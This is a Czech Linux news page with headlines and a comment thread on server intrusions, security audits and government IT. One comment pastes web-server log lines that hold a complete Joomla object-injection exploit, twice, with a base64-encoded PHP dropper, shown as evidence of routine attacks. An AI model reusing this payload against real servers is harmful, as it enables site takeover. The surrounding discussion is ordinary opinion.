3D tiskárny Original Prusa MK4S (a MK4) v kombinaci s Prusamenty PLA a PETG mají mezinárodně uznávanou certifikaci UL 2904 GREENGUARD, která potvrzuje splnění přísných bezpečnostních standardů pro VOC a UFP.
Byla vydána verze R1/beta5 open source operačního systému Haiku (Wikipedie). Přehled novinek i s náhledy v poznámkách k vydání.
Sovereign Tech Fund (Wikipedie), tj. program financování otevřeného softwaru německým ministerstvem hospodářství a ochrany klimatu, podpoří Sambu částkou 688 800 eur.
Společnost OpenAI představila novou řadu svých AI modelů OpenAI o1 navržených tak, aby "strávily více času přemýšlením, než zareagují". Videoukázky na 𝕏 nebo YouTube.
Sailathon 24, tj. hackathon mobilního operačního systému Sailfish OS, proběhne od 27. do 30. září v Praze na Strahově ve školícím centru Silicon Hill.
Bylo vydáno Ubuntu 22.04.5 LTS, tj. páté opravné vydání Ubuntu 22.04 LTS s kódovým názvem Jammy Jellyfish. Stejně tak Kubuntu 22.04.5 LTS, Ubuntu Budgie 22.04.5 LTS, Ubuntu MATE 22.04.5 LTS, Lubuntu 22.04.5 LTS, Ubuntu Kylin 22.04.5 LTS, Ubuntu Studio 22.04.5 LTS a Xubuntu 22.04.5 LTS.
Byla publikována veřejná Výroční zpráva Bezpečnostní informační služby za rok 2023 (pdf).
Byla vydána nová verze 8.7 multiplatformní digitální pracovní stanice pro práci s audiem (DAW) Ardour. Přehled oprav, vylepšení a novinek v oficiálním oznámení.
Společnost Juno Computers prodávající počítače s předinstalovaným Linuxem má nově v nabídce linuxový tablet Juno Tab 3. Na výběr je Mobian Phosh, Ubuntu 24.04 (GNOME) a Kubuntu 24.04 (KDE Plasma). Cena začíná na 699 dolarech.
VirtualBox, tj. multiplatformní virtualizační software, byl vydán v nové verzi 7.1. Přehled novinek v Changelogu. Přináší modernizovaný vzhled a ovládání. Přepínat se lze mezi základním a rozšířeným uživatelským rozhraním. NAT nově podporuje IPv6. Linuxový hostitel a host mohou sdílet schránku na Waylandu.
Tiskni Sdílej:
Malware je doménou prohlížečů.Ani nepočítám, kolikrát jsem někoho viděl řešit vypwnovaný server, protože se tam malware vlámal přes nějakou PHP mrdku, kterou programovala nějaká poloretardovaná opice (naposledy můj bratr cca půl roku zpět musel odepsat celý server a udělat kvůli tomu reinstall). Minimálně dvakrát jsem psal software, který tyhle chyby uměl hledat. Schválně se někdy podívej do logů, kolik tam je těhle útoků. Například ke mě na server je jich o dost víc, než regulérních přístupů. Doslova můžu říct, že klepou co pár minut. Typický scan, viz třeba:
181.143.27.106 - - [15/Jun/2016:01:33:41 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 40 "-" "-" 181.143.27.106 - - [15/Jun/2016:01:34:59 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 33 "-" "-" 181.143.27.106 - - [15/Jun/2016:01:36:17 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 37 "-" "-"To ani nepočítám hovna jako:
192.187.109.42 - - [14/Jun/2016:07:03:44 +0200] "GET / HTTP/1.1" 200 35641 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDataba seDriverMysql":0:{}s:8:"feed_url";s:3738:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ 1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBi U3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9 WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQm xiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwV lNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxD QW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVp USWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdm NETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d 1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4 dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkN kZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSk hSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxY m1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1 SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zS UNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}<F0><FD><FD><FD>" 192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET / HTTP/1.1" 200 35641 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:3738:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}<F0><FD><FD><FD>" 192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET /media/xxxx.php HTTP/1.1" 404 26 "-" "python-requests/2.9.1" 192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET /media/css.php HTTP/1.1" 404 25 "-" "python-requests/2.9.1"Ono obecně, někdy doporučuji si nahodit na virtuál honeypot a pak si číst logy. Člověk by asi nevěřil, kolik útoků běžně chodí na ničím nevýznamný server.
Servery jsou bez grafického rozhraní, přístup pouze přes ssh do textové konzole.Riziko zranitelnosti existuje vzdy.
Malware je doménou prohlížečů.To je naprosty nesmysl.
S tím backdoorem to možná pravda je, ale pokud je přístup pouze přes chráněnou proxy s antivir a antimalware štítem tak by mělo být riziko minimální, pokud se nepletu.Pred ctenim prikazu nekde ze vzdaleneho HTTP serveru a naslednym vyleakovanim cennych dat te asi antivir ani antimalware stit moc neuchrani. Jinak sis ale odpovedel sam - i kdyby to riziko bylo minimalni, porad existuje.
Znám několik celoplošných systémů českých bezpečnostních ministerstev (jeden systém asi 3 tisíce denně aktivních uživatelů), které jedou na linux systémech (například SLES) a k internetu 100 procentně nesmí být konektováni. Čistá LAN.
Žádný problém s provozem systémů nemají. Na jednom utajovaném jsem pracoval s HP-UX (unix) s šifrovaný dedikovanými linkami do zahraničí.
Dle mého skromného úsudku je přínos takového opatření k bezpečnosti diskutabilní, a naopak přináší spoustu práce a úskalí administrátorům těchto strojů.Je to přesně tak. Pracoval jsem na mnoha projektech, které byly "zabezpečeny" dle nějakého auditu (což je asi tak to nejhorší, co může nastat), to znamená za devatero VPN, oddělené sítě, přístupové karty apod. Pracovat se na tom nedalo. Pochopitelně, aby se na tom pracovat dalo (protože třeba ministr si na tiskovce vzpomněl, že slíbil nějaký systém), tak si ti admini vytvořili tunel přímo do těch systémů. No a dodavatelé tento tunel potom dostali taky. Takže oficiálně se dělala šaškárna s VPN kartami apod, ale reálně se jelo v podstatě přímo. Jinak by totiž ta zakázka nešla realizovat vůbec. Problém je, že jak jde čas, tak se vymění admini a na tento tunel se zapomeneme. Případně se o něj nikdo nestará, takže to zůstane v konfiguraci z roku 2007 - RSA 1024, MD5 apod. Takže další bezpečnostní hrozba. (Mimochodem, tohle je sranda. Řeší se heartbleedy apod., nahrazují se klíče, vyhazují se staré šifry - což je dobře - ale jen z webserverů, na všechno ostatní se zapomíná - třeba na ty VPNky). Další věc, úřady celkem pravidelně dostávají emaily od CSIRTu a NCKB (apod. strašně užitečných institucí) a protože na tom úřadě tomu vůbec nikdo ani náznakem nerozumí, ale mají pocit, že to "nařízení" shora musí splnit, tak to potom pošlou na dodavatele IT řešení. Výsledkem je třeba to, že se před stávající servery dá firewall (pochopitelně cisco za půl mega) a servery se nedostanou třeba ani na repositáře pro aktualizace (protože v nějakém audity nějaký ňouma napsal, že se musí blokovat směr ven). Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů. Takže ve zkratce: většina bezpečnostních opatření, které jsem ve státní správě viděl, zcela neomylně vedla k narušení bezpečnosti.
Kolik těchto strojů, které byly "zabezpečeny" dle nějakého auditu (dle tvých slov), bylo napadeno?Nevím a je to jedno.
Pokud kritizuješ nefunkční zabezpečení, je zřejmě jednoduché ty stroje napadnout.Já kritizuji stav, kdy se udělá nějaké oficiální zabezpečení a vedle toho (aby se na tom dalo vůbec pracovat a aby to vůbec běželo), se udělá díra. To, že tu díru třeba nikdo zatím nezneužil (nebo ji zneužil tak, že to nikdo nepoznal), na věci nic nemění. Je také dost dobře možné, že ta díra je zabezpečena dostatečně (alespoň po určitý čas) a tedy to oficiální, superdrahé zabezpeční je prostým plýtváním (zkrátka se to mohlo udělat rovnou technologií té díry). Ať tak či onak, nepovažuji za vhodné z hlediska bezpečnosti, pokud se systém navrhne nějakým způsobem (který odporuje provozu), a potom se pokoutně provozuje zcela jinak. Představ si, že by se tímto způsobem stavěly dálnice. Že by třeba někdo ignoroval okolní prostředí ... ehm špatný příklad ... nebo třeba stavěly mosty ... kua, zase Snad je jasné, kam tím mířím.
nějaké oficiální zabezpečeníA jak jsem psal. Ono je to často dělané stylem, že NCKB pošle email, na úřadě mu vůbec nikdo nerozumí, tak to pošle na dodavatele*, ten se k tomu třeba vyjádří stylem, že je to zcela nerelevantní, úřad pošle befel, že to musí být, tak to dodavatel udělá (no, nějak). Výsledkem je chaos vzájemně nespolupracujících opatření. Takto se bezpečnost dosáhnout nedá. *) Pokud se ovšem vůbec trefí do toho správného. Úřady mají mnoho IT dodavatelů (sít, fw, vpn, virtualizace, hw, dodavatel webů, dodatavel intranetu apod.) a některé ani vůbec neví, která firma jim co dělá (zrovna dneska mi přišel takový hezký bug appky cizí firmy. Dřív jsem jim alespoň psal, která firma jim to dodala, ale přestal jsem s tím po zjištění, že si to ani neobtěžují zapamatovat.). Do takového prostředí pak přijde kontrola z ministerstva a vypadá to stejně jako v Monty Python's skeči (akorát v reálu, je to ještě větší sranda).
Je to přesně tak. Pracoval jsem na mnoha projektech, které byly "zabezpečeny" dle nějakého auditu (což je asi tak to nejhorší, co může nastat), to znamená za devatero VPN, oddělené sítě, přístupové karty apod. Pracovat se na tom nedalo.vs.
tak si ti admini vytvořili tunel přímo do těch systémů. No a dodavatelé tento tunel potom dostali taky. Takže oficiálně se dělala šaškárna s VPN kartami apod, ale reálně se jelo v podstatě přímo. Jinak by totiž ta zakázka nešla realizovat vůbec.Takže reálně podmínky toho auditu pravděpodobně nesplnily.
Případně se o něj nikdo nestará, takže to zůstane v konfiguraci z roku 2007 - RSA 1024, MD5 apod. Takže další bezpečnostní hrozba.Takový systém by neprošel ani PCI-DSS v 3.2 auditem.
Výsledkem je třeba to, že se před stávající servery dá firewall (pochopitelně cisco za půl mega) a servery se nedostanou třeba ani na repositáře pro aktualizace (protože v nějakém audity nějaký ňouma napsal, že se musí blokovat směr ven). Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů.On pravděpodobně ten auditor taky řekl, že ty systémy musí být aktualizované, takže je akorát tak chyba té organizace, že dodržela část doporučení a část ne. Mají si nasadit lokální mirror, jako to dělají každé normální security-aware organizace, stahovat aktualizace z public repository je stejně blbost, protože jak chceš třeba zajistit testování jednotlivých aktualizací? Zpravidla se aktualizace nejdřív testují a pak se pustí do produkčního prostředí.
takže je akorát tak chyba té organizaceAno, říkal jsem, že tomu na těch úřadech vůbec nikdo nerozumí. (Až na výjimky, jsou ministerstva, se kterými se pracuje dobře a na IT jsou skuteční admini.)
Mají si nasadit lokální mirror, jako to dělají každé normální security-aware organizace, stahovat aktualizace z public repository je stejně blbost, protože jak chceš třeba zajistit testování jednotlivých aktualizací?Jo, což by dopadlo přesně tak, že nějaká firma by nasadila lokální mirror (a zakázka je hotova), tento mirror by se stejně nikam nenastavil (protože firma nasazující tento mirror nemá oprávnění ani možnosti zasahovat do serverů), a potom by stejně přišel befel blokujte odchozí provoz a ani servery tohoto mirorru by se nedostaly na repa.
tento mirror by se stejně nikam nenastavil (protože firma nasazující tento mirror nemá oprávnění ani možnosti zasahovat do serverů),Tak když si někdo neumí udělat specifikaci vlastního IT prostředí... Jako třeba že každý server toho a toho typu musí být nastaven tak a tak - třeba CIS hardening,... tak se nedivím, že vám ty audity neprocházejí :D
na všechno ostatní se zapomíná - třeba na ty VPNkyTohle mě fascinuje. Debian Jessie měl po vydání v Dovecotu defaultně RC4-40 a MD5 a openvpn snad dosud generuje 1024b RSA klíče (minimálně na Wheezym ještě generovala).
Další věc, úřady celkem pravidelně dostávají emaily od CSIRTu a NCKB (apod. strašně užitečných institucí) a protože na tom úřadě tomu vůbec nikdo ani náznakem nerozumíDopis od NCKB. Taky mi chvíli trvalo, než jsem pochopil, co se mi vlastně snaží sdělit.
Protože to dodavatel těch serverů (který se samozřejmě jiný, než dodavatel sítě a ten je jiný jak dodavatel VPN a tak dále), to nechce řešit (protože je to tak na půl roku a stejně mu končí smlouva), tak ty servery zůstanou rovnou bez updatů.Pak potkávám ještě jeden scénář: dodavatel nainstaluje CentOS/Debian se svojí aplikací, nikomu nic neřekne a odejde. Distribuci skončí podpora a nikdo to nedokáže aktualizovat, aby se to nerozsypalo.
Pak potkávám ještě jeden scénář: dodavatel nainstaluje CentOS/Debian se svojí aplikací, nikomu nic neřekne a odejde. Distribuci skončí podpora a nikdo to nedokáže aktualizovat, aby se to nerozsypalo.A pak přišel Docker...
Je to tak. Vyzkoušel jsem si taky jediný požadavek. Až druhý den kolem 10. hodiny zablokovaly TCP porty pro SSH, IMAPS, IPv6 nad IPv4 a kdoví co ještě. Oběma směry. Tak jsem jim tam zavolal, UPC problém identifikovalo jako „malware“ a trvali na tom, abych pročistil systém. Na to jsem chtěl podrobnosti, ať vím, co hledat, to ale nebyli ochotni sdělit. Tak jsem poměrně nesrozumitelně nadhodil on IP adresu a operátor se chytil a řekl, že tam má uveden pokus o spojení na její port 80. Trochu jsem si postěžoval, že by příště by mohli informovat e-mailem o zablokování (nic mi nepřišlo) a na blokovaný provoz by mohli reagovat ICMP zprávami namísto tichého zahazování. Operátor mě ujistil, že se mým zlepšovákem budou zabývat. Je fakt smutné, že jediný SYN packet může odpojit zákazníka.
Operátor mě ujistil, že se mým zlepšovákem budou zabývat.Překlad: jdi do prdele a polož už konečně ten telefon.